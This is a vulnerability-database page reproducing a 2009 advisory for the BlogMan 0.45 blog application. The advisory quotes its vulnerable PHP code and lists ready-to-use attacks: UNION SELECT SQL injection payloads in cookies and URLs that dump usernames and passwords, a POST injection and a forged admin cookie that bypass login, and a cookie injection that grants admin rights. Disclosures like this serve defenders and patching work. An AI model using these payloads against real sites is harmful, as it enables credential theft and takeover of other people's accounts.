Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

blogman 0.45 Multiple Vulnerabilities

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 9 Views

BlogMan 0.45 Multiple Security Vulnerabilitie

Code

                                                *******   Salvatore "drosophila" Fresta   *******


Application:       BlogMan
                          http://sourceforge.net/projects/blogman/
Version:             0.45
Bug:                   * Multiple SQL Injection
                          * Authentication Bypass
                          * Privilege Escalation
Exploitation:      Remote
Date:                 1 Mar 2009
Discovered by:  Salvatore "drosophila" Fresta
Author:              Salvatore "drosophila" Fresta
                          e-mail: [email protected]
              	

*************************************************

- BUGS

This blog is entirely vulnerable to SQL Injection.
The following are vulnerable queries that can be used
to obtain reserved information.

#[1] SQL Injection:

	Requisites: magic_quotes_gpc = off

	File affected: index.php, register.php, viewall.php
	
	The following lines are improperly checked:
	
	/*
		if (isset($_COOKIE['blogmanuserid'])) {
			$id = $_COOKIE['blogmanuserid'];
			$query = "SELECT * FROM user WHERE UserID='".$id."'";
			$user = mysql_fetch_array(mysql_query($query)) or die(mysql_error());
		    echo "<p class='loginusername'><a
href='edit.php?id=".$id."'>".$user['UserName']."</a></p>\n";
	*/
	
	Using a cookie editor it is possible to edit that cookie
	and manage the query, as follows:
	
	Name: blogmanuserid
	Content: -1' UNION ALL SELECT
1,CONCAT(UserName,char(58),UserPassword),3,4,5,6,7,8,9,10,11,12,13,14,15,16
FROM user#
	Server: target_server (example: localhost)
	Path: /blogman/


#[2] SQL Injection:

	Requisites: magic_quotes_gpc = off

	File affected: read.php
	
	This bug allows a guest to view the username
	and password of a registered user.
	
	http://site/path/read.php?id=-1'UNION ALL SELECT
NULL,2,CONCAT(UserName,char(58),UserPassword),NULL,5,6,7 FROM user%23
	

#[3] SQL Injection:

	Requisites: magic_quotes_gpc = off

	File affected: profile.php
	
	This bug allows a guest to view the username
	and password of a registered user.
	
	http://site/path/profile.php?id=-1' UNION ALL SELECT
1,CONCAT(UserName,char(58),UserPassword),3,4,5,6,7,8,9,10,11,12,13,14,15,16
FROM user%23


#[1] Authentication Bypass:

	Requisites: magic_quotes_gpc = off

	File affected: doLogin.php
	
	The following lines are improperly checked:
	
	/*
		$un = $_POST['un'];
		$pw = $_POST['pw'];
		
		...
		
		$pwHashed = mysql_fetch_array(mysql_query("SELECT PASSWORD('".$pw."')"));
		$userRow = mysql_fetch_array(mysql_query("SELECT * FROM user WHERE
UserName='".$un."'"));
	        if ($userRow['UserPassword'] == $pwHashed[0] &&
$userRow['UserActive'] && !$userRow['UserDisabled']) {
		    $expires = time() + 3*24*60*60;
		    setcookie("blogmanuserid", $userRow['UserID'], $expires);
	        }
	*/
	
	Using a SQL Injection bug it is possible to bypass
	conditions and to set an arbitrary UserID value.
	
	The following information must be sent using
	POST method to doLogin.php
	
	un = ' UNION ALL SELECT
1,NULL,PASSWORD('mypass'),NULL,NULL,NULL,NULL,NULL,NULL,0,1,NULL,NULL,NULL,NULL,NULL#
	pw = mypass
	
	The First value is UserID, the third value is the password,
	the tenth value is UserDisabled and the eleventh value is
	UserActive.


#[2] Authentication Bypass:

	Requisites: none
	
	File affected: all
	
	It is possible to bypass the authentication
	system by creating a cookie named 'blogmanuserid',
	and inserting the value of a registered user id
	into the content(sometimes 1 for admin):
	
	Name: blogmanuserid
	Content: 1	
	Server: target_server (example: localhost)
	Path: /blogman/
	
	
Privilege Escalation:

	Requisites: magic_quotes_gpc = off

	File affected: admin.php
	
	It is possible to escalate privileges using
	a SQL Injection bug through a cookie.
	
	The following lines are improperly checked:
	
	/*
	        $id = $_COOKIE['blogmanuserid'];
		$user = mysql_fetch_array(mysql_query("SELECT * FROM user WHERE
UserID='".$id."'"));
		if (!$user['UserCanAdmin']) {
			echo "<meta http-equiv='refresh' content='0;index.php'></head></html>";
		} else {
			...
		}
	*/
	
	Name: blogmanuserid
	Content: -1' UNION ALL SELECT 2,NULL,3,4,5,6,7,8,9,10,11,12,13,14,15,1#	
	Server: target_server (example: localhost)
	Path: /blogman/
	
	The first value is UserID and the last value
	is UserCanAdmin.


*************************************************

# milw0rm.com [2009-03-02]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
blogmanmultiple vulnerabilitiessql injectionauthentication bypassprivilege escalationremote exploitation1 mar 2009salvatore "drosophila" frestaapplication security
9